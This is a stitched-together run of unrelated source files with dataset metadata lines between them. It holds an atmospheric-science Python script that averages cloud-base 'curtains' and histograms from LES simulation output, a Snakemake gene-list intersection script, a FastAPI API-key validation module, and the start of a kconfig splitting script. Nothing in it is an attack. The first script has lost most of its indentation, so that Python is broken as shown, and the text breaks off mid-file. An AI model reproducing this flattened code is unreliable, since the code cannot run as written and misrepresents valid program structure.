# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
                #Here we reshape the 3D fields into 2D slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
                #Now we do the same thing with the transposed field; this used to be an either/or, now we just append it
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
                #to get the fake time vector we load the wind from the profile data; the grid spacing divided by the wind speed gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, V_ref, time_resolution )
print('ref_lvl used to determine reference winds',ref_lvl )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
        #Used to have a different method using nans that doesn't work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
        #Now find cloud bases lower than the max CBL height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
        #Scaling between x and y is calculated here if required. It is skipped for the very short dummy fields that are passed when no clouds are present
if scale_flag > 0 and t_1d.shape[0]>3:
#calculate the profiles of u and v and their scaling
u_ref_prof = file_prof['u'][it,:]
v_ref_prof = file_prof['v'][it,:]
V_ref_prof = np.sqrt(u_ref_prof**2+v_ref_prof**2)
scaling_factor_x_prof = u_ref_prof/V_ref_prof
scaling_factor_y_prof = v_ref_prof/V_ref_prof
#Using the mean cloud base height as the reference lvl
ref_idx = np.mean(cl_base[cbl_cl_idx])
if scale_flag == 1:
                #the scaling factors are taken at a single reference level (the mean cloud base index)
scaling_factor_x = scaling_factor_x_prof[int(ref_idx)]
scaling_factor_y = scaling_factor_y_prof[int(ref_idx)]
print('Scaling flag 1: scaling factor_x: ',scaling_factor_x,' scaling factor_y: ',scaling_factor_y, ' int(ref_idx): ',int(ref_idx))
if scale_flag == 2:
                #Regularizing the scaling profiles and interpolating them onto the regularized z axis
d_z_tmp = 1.0/ref_idx
nz = scaling_factor_x_prof.shape[0]
z_reg_orig_top = d_z_tmp*nz-d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
                #Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
scaling_factor_x_prof_ext = np.hstack([scaling_factor_x_prof[0],scaling_factor_x_prof])
scaling_factor_y_prof_ext = np.hstack([scaling_factor_y_prof[0],scaling_factor_y_prof])
                #1D vertical interpolation to get the scaling factors on the regularized z axis
f_x = interp1d(z_reg_orig, scaling_factor_x_prof_ext, kind='nearest')
f_y = interp1d(z_reg_orig, scaling_factor_y_prof_ext, kind='nearest')
scaling_factor_x_inter = f_x(z_reg_mid)
scaling_factor_y_inter = f_y(z_reg_mid)
print('Scaling flag 2:, mean scaling_factor_x_inter: ',np.mean(scaling_factor_x_inter),
' mean scaling_factor_y_inter: ',np.mean(scaling_factor_y_inter))
### Clustering 1D
#Now we simply go through all cloudy timesteps
#As long as the difference to the next cloudy timestep is lower than t_gap it counts as the same cloud
        #As an additional constraint, if the cloudy cells are right next to each other they are always counted as consecutive, no matter the time distance between them.
        #if the difference is larger than t_gap the cloud is over, and a chordlength is created which is a list of all timesteps that belong to that chordlength
        #However if the duration of the chordlength is lower than t_min or higher than t_max seconds it isn't counted
        #I added an additional constraint that each chord must include at least cell_min cells, because it is possible to get
        #small chord lengths with more than t_min which are mostly gaps.
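        #Illustrative example (values assumed): with t_gap=20 s, cloudy columns at
        #t = 100, 105, 110 and 125 s are connected into one chord, while a next
        #cloudy column at t = 160 s starts a new chord.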
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
while t_cloudy_idx < len(cbl_cl_idx)-1 and n_chords<chord_max:
#print('t_chord_begin',t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#print('t_chord_end',t_chord_end)
            #Checking if it fulfills the chord criteria regarding time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
chord_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
chord_duration = 0
if chord_duration>t_min and chord_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_cloudy_idx]))
#Here we start the interpolation stuff
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
                #Calculate the beginning and end of the curtain, we add a bit to each side to make interpolation easy
idx_beg_curtain = (np.abs(t_1d - (time_beg_chord-curtain_extra*(time_end_chord-time_beg_chord)))).argmin()-1
idx_end_curtain = (np.abs(t_1d - (time_end_chord+curtain_extra*(time_end_chord-time_beg_chord)))).argmin()+2
idx_end_curtain = min(idx_end_curtain,nt-1)
time_beg_curtain = t_1d[idx_beg_curtain]
time_end_curtain = t_1d[idx_end_curtain]
chord_cells = t_chord_end-t_chord_begin
curtain_cells = idx_end_curtain-idx_beg_curtain
                #If the curtain has more than curtain_min cells and neither the curtain tail extends beyond the end of the 2d field nor the beginning extends before it.
                #I added 2 cells buffer at the beginning and end, because for the interpolation a bit of overlap is used.
if idx_end_curtain<nt-2 and idx_beg_curtain>2 and len(cbl_cl_idx[t_chord_begin:t_chord_end])>curtain_min-1:
n_curtain += 1
                        #First thing to do is calculate the chord base using the base_percentile (default 25th percentile) in agreement with Neil
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]],base_percentile))
#Regularized curtains, I am too lazy to pass on all my variables to func_curtain_reg so I instead made it a nested function
var_curtain_tmp = (func_curtain_reg(var_2d)).transpose()
if boundary_scaling_flag == 1:
#Now adding the boundary scaling using w*
surf_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
                                boundary_scaling = thl_flux/w_star
var_curtain_tmp = var_curtain_tmp/boundary_scaling
#Finally add it to the mean one and track one more curtain
#detecting if chord base has a positive or negative w, then adds to the sum of up or downdraft chords
w_tmp = w_2d[cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]]-1,cbl_cl_idx[t_chord_begin:t_chord_end]]
#print(w_tmp)
#Scaling is now added here,
                        #Things are applied twice so that after dividing by n it comes out fine
                        #We assume here that n_x and n_y are roughly the same
#Could be made cleaner later on
if scale_flag>0 and data_dim_flag==3:
if scale_flag==1:
#find out if we need scaling_factor_x or y by seeing if we are in the first or second half
if idx_end_curtain<nt/2:
scaling_factor = 2*scaling_factor_x
else:
scaling_factor = 2*scaling_factor_y
if scaling_factor>0:
var_curtain_tmp = var_curtain_tmp[::-1,:]
var_curtain_tmp = abs(scaling_factor) * var_curtain_tmp
if scale_flag==2:
if idx_end_curtain<nt/2:
scaling_factor_prof = 2*scaling_factor_x_inter
else:
scaling_factor_prof = 2*scaling_factor_y_inter
for n_prof in range(scaling_factor_prof.shape[0]):
if scaling_factor_prof[n_prof]>0:
var_curtain_tmp[:,n_prof] = var_curtain_tmp[::-1,n_prof]
var_curtain_tmp [:,n_prof]= abs(scaling_factor_prof[n_prof])*var_curtain_tmp[:,n_prof]
#Now adding the var_curtain_tmp to the sums
var_curtain_sum = var_curtain_sum+var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_up += 1
var_curtain_up_sum += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_dw += 1
var_curtain_dw_sum += var_curtain_tmp
else:
                            print('warning: mean cloud base w is exactly zero: ',np.mean(w_tmp),w_tmp)
#globals().update(locals())
###############################################################################################################################################
################## SIZE BINNING ##############################################################################################################
###############################################################################################################################################
if size_bin_flag:
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
chord_length = ch_duration*V_ref
#if scale_flag==0:
# scaling_factor=1.
#find index of bin close to mid size bin
                            bin_idx = np.where(np.abs(chord_length-mid_bin_size)<bin_size/2)[0]
if bin_idx.size>0:
#print('bin_idx,chord_length',bin_idx,chord_length)
n_curtain_bin[bin_idx] += 1
var_curtain_bin_sum[bin_idx,:,:] = var_curtain_bin_sum[bin_idx,:,:] + var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_bin_up[bin_idx] += 1
var_curtain_bin_up_sum[bin_idx,:,:] += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_bin_dw[bin_idx] += 1
var_curtain_bin_dw_sum[bin_idx,:,:] += var_curtain_tmp
else:
print('wtf how is this zero: ',np.mean(w_tmp),w_tmp)
##############################################################################################################################
#PLOTS
##############################################################################################################################
#If the plot flag is set the pre regularization curtains are plotted.
if plot_curtains_flag ==1:
print('plotting not implemented yet')
##############################################################################################################################
#switching to y direction if half of max chords reached
##############################################################################################################################
if n_chords == int(chord_max/2):
t_cloudy_idx = int(len(cbl_cl_idx)/2)
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('curtain processing:',(time3-time2)/60.0,'minutes')
print(':')
print(':')
print(':')
time_end = ttiimmee.time()
print('total run time of proc_beard_regularize in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print(':')
#Replacing saving with xarray
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time'), var_curtain_sum.transpose()/n_curtain),
reg_var+'_up':(('regularized height', 'regularized time'), var_curtain_up_sum.transpose()/n_curtain_up),
reg_var+'_dw':(('regularized height', 'regularized time'), var_curtain_dw_sum.transpose()/n_curtain_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid})
xr_dataset[reg_var].attrs['n']=n_curtain
xr_dataset[reg_var+'_up'].attrs['n']=n_curtain_up
xr_dataset[reg_var+'_dw'].attrs['n']=n_curtain_dw
xr_dataset.attrs = settings_dict
#Making save string
save_string_base = '_beard_'+date+'_d'+str(data_dim_flag)+'_cb'+str(base_smoothing_flag)+'_an'+str(anomaly_flag)+'_ct'+str(chord_times)+'_ce'+str(int(curtain_extra))
if data_dim_flag==3:
save_string_base = save_string_base+'_sf'+str(scale_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_curtain)
save_string = directory_output+ reg_var+save_string_base +'.nc'
xr_dataset.to_netcdf(save_string)
print('saved beard data to '+save_string)
if size_bin_flag==1:
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time','length'), var_curtain_bin_sum.transpose()/n_curtain_bin),
reg_var+'_up':(('regularized height', 'regularized time','length'), var_curtain_bin_up_sum.transpose()/n_curtain_bin_up),
reg_var+'_dw':(('regularized height', 'regularized time','length'), var_curtain_bin_dw_sum.transpose()/n_curtain_bin_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid, 'length':mid_bin_size})
xr_dataset[reg_var].attrs['n'] =n_curtain_bin
xr_dataset[reg_var+'_up'].attrs['n'] =n_curtain_bin_up
xr_dataset[reg_var+'_dw'].attrs['n'] =n_curtain_bin_dw
xr_dataset.attrs = settings_dict
save_string = directory_output+ reg_var+save_string_base+'_sizebin.nc'
xr_dataset.to_netcdf(save_string)
print('saved size binned beards to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
return
#A simple script which calculates a histogram below the cloud base and saves it
#I will try to keep it at least somewhat general with a flexible variable
def proc_pdf(reg_var = 'w',
date_str='20160611',
directory_input ='/data/testbed/lasso/sims/',
directory_output ='data_pdfs/',
data_dim_flag=3,
special_name='',
N_it_max=1e9,
N_it_min=0,
anomaly_flag =0,
N_bins=400,
base_percentile = 25,
boundary_scaling_flag = 1,
range_var = [-10,10] ):
#We are starting out with histograms of w from -10 to 10 and a 0.1 spacing
var_hist_sum=np.zeros(N_bins)
date = date_str
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of minimum z_vlvl of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*.column.*.*.*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
        file_w = Dataset(filename_w, 'r')
        file_ql = Dataset(filename_l, 'r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
        file_var = Dataset(filename_var, 'r')
filename_prof=glob.glob(directory_input+date+'/testbed?default?0*.nc')[0]
#filename_prof=directory_input+date+'/testbed.default.0000000.nc'
if date=='bomex':
filename_prof=directory_input+date+'/bomex.default.0000000.nc'
    file_prof = Dataset(filename_prof, 'r')
extra_string = ''
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
        #Minimum of the LCL or the w-variance height plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
            print('warning, cbl height higher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
            file_col = Dataset(filename_column[it], 'r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
            #Load the var file, even if it means that we double load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
            #to get anomalies we subtract the closest mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
                #Here we have to reshape the 3D fields into 2D slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#This might save a bit of memory
if reg_var == 'w':
var_2d = w_2d
if reg_var == 'ql':
var_2d = ql_2d
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#fake t vector,
t_1d = np.linspace(0,2*nx*ny,2*nx*ny)
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
                #to get the fake time vector we load the wind from the profile data, which divided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
                #The needed cbl height, which is constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
        #Used to have a different method using nans that doesn't work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
        #Now find cloud base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
if len(cbl_cl_idx)>0:
#Now calculating the var at cloud base
var_cl_base=var_2d[cl_base[cbl_cl_idx]-1,cbl_cl_idx]
#If boundary scaling is used, the variable is scaled accordingly
#Only called if there are any clouds
if boundary_scaling_flag == 1 and len(cbl_cl_idx)>1:
#First thing to do is calculate the chord base using the 25 percentile in agreement with Neil
if data_dim_flag==3:
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx],base_percentile))
                # Can't think of a good way to do this, will throw an error for the time being.
if data_dim_flag==1:
                    print("sorry, but I haven't implemented star scaling for 1d data")
sys.exit()
#Now adding the boundary scaling using w*
#Is a bit overcooked currently as it only works with 3D data and thus all surface fluxes are the same everywhere.
surf_flux = np.mean(bflux_s_1d)
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d)
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d)
                    boundary_scaling = thl_flux/w_star
var_cl_base = var_cl_base/boundary_scaling
#Calculating the histogram, and adding it to the total histogram
var_hist,bin_edges = np.histogram(var_cl_base,range=range_var,bins=N_bins)
var_hist_sum = var_hist_sum+var_hist
else:
print('no cloudy columns apparently')
var_pdf = var_hist_sum
save_string_base = '_pdf_'+date+'_d'+str(data_dim_flag)+'_an'+str(anomaly_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string = directory_output+ reg_var+save_string_base
save_string = save_string+'.npz'
np.savez(save_string,var_pdf=var_pdf,range_var=range_var)
print('saved pdf with ', sum(var_pdf), 'points to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
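# Minimal usage sketch (not part of the original script; the directories below match the
# defaults above but should be treated as assumptions): how proc_pdf might be invoked to
# build a histogram of w at cloud base for one simulated day from the 3D fields.
#
# proc_pdf(reg_var='w',
#          date_str='20160611',
#          directory_input='/data/testbed/lasso/sims/',
#          directory_output='data_pdfs/',
#          data_dim_flag=3,
#          N_bins=400,
#          range_var=[-10, 10])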
| 2.265625 | 2 |
expression-atlas-wf/scripts/dmel_tau_housekeeping.py | jfear/larval_gonad | 1 | 5087 | """D. mel housekeeping genes based on tau.
Uses the intersection of w1118 and orgR to create a list of
D. mel housekeeping genes.
"""
import os
from functools import partial
import pandas as pd
from larval_gonad.io import pickle_load, pickle_dump
def main():
# Load mapping of YOgn to FBgn
annot = pickle_load(snakemake.input.annot[0])
pickle_dump(intersect_fbgns(snakemake.input.male, annot), snakemake.output.male)
pickle_dump(intersect_fbgns(snakemake.input.female, annot), snakemake.output.female)
def intersect_fbgns(file_names, annot):
return list(set.intersection(*list(map(partial(convert_to_fbgn, annot=annot), file_names))))
def convert_to_fbgn(file_name, annot):
return set(
[
fbgn
for fbgn in map(lambda x: annot.get(x, None), pickle_load(file_name))
if fbgn is not None
]
)
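# Illustrative sketch (toy values, not from the workflow): intersect_fbgns keeps only
# the FBgn IDs present in every input file after mapping YOgn -> FBgn through `annot`.
# With pickled inputs equivalent to {"YOgn01", "YOgn02"} and {"YOgn02", "YOgn03"} and
# annot = {"YOgn01": "FBgn1", "YOgn02": "FBgn2", "YOgn03": "FBgn3"},
# intersect_fbgns(file_names, annot) would return ["FBgn2"].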
if __name__ == "__main__":
if os.getenv("SNAKE_DEBUG", False):
from larval_gonad.debug import snakemake_debug
snakemake = snakemake_debug(
workdir="expression-atlas-wf",
input=dict(
male=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_male.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_male.pkl",
],
female=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_female.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_female.pkl",
],
annot="../output/expression-atlas-wf/YOgn_to_dmel_ortholog/dmel.pkl",
),
)
main()
| 2.4375 | 2 |
api-server/server/core/key.py | TK-IBM-Call-for-Code-Challange-2021/call-for-code-challenge-2021 | 75 | 5088 | <filename>api-server/server/core/key.py
"""
Api Key validation
"""
from typing import Optional
from fastapi.security.api_key import APIKeyHeader
from fastapi import HTTPException, Security, Depends
from starlette.status import HTTP_401_UNAUTHORIZED, HTTP_400_BAD_REQUEST, HTTP_403_FORBIDDEN
from server.core.security import verify_key
from server.db.mongodb import AsyncIOMotorClient, get_database
from server.models.user import User
from server.db.crud.user import get_user_by_email
from pydantic import EmailStr
api_key_scheme = APIKeyHeader(name="X-API-KEY", auto_error=False)
email_scheme = APIKeyHeader(name="X-EMAIL-ID", auto_error=False)
async def validate_request(
api_key: Optional[str] = Security(api_key_scheme),
email_id: Optional[EmailStr] = Security(email_scheme),
db: AsyncIOMotorClient = Depends(get_database)
) -> Optional[User]:
"""Validate a request with given email and api key
to any endpoint resource
"""
if api_key is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-API-KEY is missing", headers={}
)
if email_id is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-EMAIL-ID is missing", headers={}
)
user = await get_user_by_email(db, email_id)
# verify email & API key
if user:
api_key = str(user.salt) + str(api_key)
if not verify_key(api_key, user.hashed_api_key):
# api key mismatch
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Access not allowed", headers={}
)
if user.disabled:
# disabled user
raise HTTPException(
status_code=HTTP_403_FORBIDDEN, detail="User is disabled", headers={}
)
if not user.is_active:
# user's email is not verified
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Email not verified", headers={}
)
# All verified
return User(**user.dict())
else:
# not a valid email provided
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="Unknown Email", headers={}
)
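# Illustrative sketch (the route path and response fields are assumptions, not part of
# this module): validate_request is intended to be used as a FastAPI dependency so that
# a protected endpoint receives the verified User.
#
# from fastapi import APIRouter
#
# router = APIRouter()
#
# @router.get("/profile")
# async def read_profile(current_user: User = Depends(validate_request)):
#     return {"disabled": current_user.disabled, "active": current_user.is_active}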
| 2.453125 | 2 |
scripts/kconfig-split.py | Osirium/linuxkit | 7,798 | 5089 | <reponame>Osirium/linuxkit<gh_stars>1000+
#!/usr/bin/env python
# This is a slightly modified version of ChromiumOS' splitconfig
# https://chromium.googlesource.com/chromiumos/third_party/kernel/+/stabilize-5899.B-chromeos-3.14/chromeos/scripts/splitconfig
"""See this page for more details:
http://dev.chromium.org/chromium-os/how-tos-and-troubleshooting/kernel-configuration
"""
import os
import re
import sys
allconfigs = {}
